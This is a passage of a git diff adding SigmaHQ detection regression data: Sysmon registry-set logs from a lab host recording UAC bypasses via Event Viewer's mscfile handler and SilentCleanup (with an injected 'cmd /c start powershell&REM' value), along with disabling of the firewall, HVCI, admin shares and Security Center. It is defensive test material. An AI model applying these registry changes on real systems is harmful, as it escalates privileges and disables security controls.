7fce1d05-2297-48a4-a670-f28745819c8a +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 46dd5308-4572-4d12-aa43-8938f0184d4f + title: Bypass UAC Using DelegateExecute +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx new file mode 100644 index 000000000..17d338b42 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json new file mode 100644 index 000000000..8b7365170 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:43:38.730630Z" + } + }, + "EventRecordID": 27806256, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:43:38.715", + "ProcessGuid": "5AA13A44-5DCA-68FE-8B55-000000004002", + "ProcessId": 9920, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\mscfile\\shell\\open\\command\\(Default)", + "Details": "C:\\Windows\\System32\\cmd.exe", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml new file mode 100644 index 000000000..e6917946a --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml @@ -0,0 +1,13 @@ +id: a6667fba-7437-4b37-8584-5de021f91115 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af + title: Bypass UAC Using Event Viewer +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx new file mode 100644 index 000000000..fc787097b Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json new file mode 100644 index 000000000..4f307ee8b --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:50:12.576627Z" + } + }, + "EventRecordID": 27929906, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:50:12.565", + "ProcessGuid": "5AA13A44-5F54-68FE-B455-000000004002", + "ProcessId": 2768, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Environment\\windir", + "Details": "cmd /c start powershell&REM", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml new file mode 100644 index 000000000..199dda002 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml @@ -0,0 +1,13 @@ +id: 48965782-760d-4620-9bf3-7fb0bb441d0f +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 724ea201-6514-4f38-9739-e5973c34f49a + title: Bypass UAC Using SilentCleanup Task +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx new file mode 100644 index 000000000..26a6abf83 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json new file mode 100644 index 000000000..2d60d8671 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:10:21.083557Z" + } + }, + "EventRecordID": 28299540, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:10:21.071", + "ProcessGuid": "5AA13A44-640D-68FE-3756-000000004002", + "ProcessId": 992, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber", + "Details": "DWORD (0x00001189)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/info.yml b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/info.yml new file mode 100644 index 000000000..3d555efd6 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/info.yml @@ -0,0 +1,13 @@ +id: 88bf1ccf-789d-4864-9eaf-547990ffe90a +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 509e84b9-a71a-40e0-834f-05470369bd1e + title: Default RDP Port Changed to Non Standard Port +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx new file mode 100644 index 000000000..9723210ff Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json new file mode 100644 index 000000000..cf3695211 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json @@ -0,0 +1,156 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:12:38.481829Z" + } + }, + "EventRecordID": 28344631, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:12:38.476", + "ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002", + "ProcessId": 7460, + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\https", + "Details": "DWORD (0x00000002)", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:12:38.491176Z" + } + }, + "EventRecordID": 28344632, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:12:38.476", + "ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002", + "ProcessId": 7460, + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\http", + "Details": "DWORD (0x00000002)", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:12:38.500426Z" + } + }, + "EventRecordID": 28344633, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:12:38.492", + "ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002", + "ProcessId": 7460, + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\*", + "Details": "DWORD (0x00000002)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_change_security_zones/info.yml b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/info.yml new file mode 100644 index 000000000..c2c2b949d --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/info.yml @@ -0,0 +1,13 @@ +id: a118df85-dbf8-48d6-a3a6-f6ddebf975b6 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 45e112d0-7759-4c2a-aa36-9f8fb79d3393 + title: IE Change Domain Zone +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx new file mode 100644 index 000000000..1ce10fa0b Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json new file mode 100644 index 000000000..4647bf116 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:22:33.661127Z" + } + }, + "EventRecordID": 28528165, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:22:33.654", + "ProcessGuid": "5AA13A44-66E9-68FE-AC56-000000004002", + "ProcessId": 7108, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled", + "Details": "DWORD (0x00000000)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml new file mode 100644 index 000000000..b67697e10 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml @@ -0,0 +1,13 @@ +id: b60c9c4c-27e7-4870-af1d-f35582a44c07 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a + title: Hypervisor Enforced Code Integrity Disabled +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx new file mode 100644 index 000000000..72a44cd77 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json new file mode 100644 index 000000000..37412a2b7 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json @@ -0,0 +1,104 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:29:32.286061Z" + } + }, + "EventRecordID": 28656599, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:29:32.271", + "ProcessGuid": "5AA13A44-688C-68FE-D556-000000004002", + "ProcessId": 2712, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\AutoShareServer", + "Details": "DWORD (0x00000000)", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:29:32.296086Z" + } + }, + "EventRecordID": 28656618, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:29:32.287", + "ProcessGuid": "5AA13A44-688C-68FE-D656-000000004002", + "ProcessId": 368, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\AutoShareWks", + "Details": "DWORD (0x00000000)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml new file mode 100644 index 000000000..25e592504 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml @@ -0,0 +1,13 @@ +id: c99b67cd-0a57-4023-9f88-35806d622b48 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e + title: Disable Administrative Share Creation at Startup +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx new file mode 100644 index 000000000..b0ba1d71f Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json new file mode 100644 index 000000000..5e875acc2 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:36:31.269411Z" + } + }, + "EventRecordID": 28785637, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:36:31.258", + "ProcessGuid": "5AA13A44-6A2F-68FE-0857-000000004002", + "ProcessId": 9720, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\\EnableFirewall", + "Details": "DWORD (0x00000000)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml new file mode 100644 index 000000000..7a92d4f5f --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml @@ -0,0 +1,13 @@ +id: aa89a142-e72f-4b37-acd2-274ed81a1477 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 974515da-6cc5-4c95-ae65-f97f9150ec7f + title: Disable Microsoft Defender Firewall via Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx new file mode 100644 index 000000000..4b5fc4bf9 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json new file mode 100644 index 000000000..454733fba --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:42:48.447971Z" + } + }, + "EventRecordID": 28901143, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:42:48.434", + "ProcessGuid": "5AA13A44-6BA8-68FE-2F57-000000004002", + "ProcessId": 7476, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience", + "Details": "DWORD (0x00000000)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml new file mode 100644 index 000000000..77bf034fb --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml @@ -0,0 +1,13 @@ +id: b5d83cd8-e1e5-459e-9f06-7c1e41a9bfeb +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6 + title: Disable Windows Security Center Notifications +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx new file mode 100644 index 000000000..7e2621d0d Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json new file mode 100644 index 000000000..af2346ce4 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + 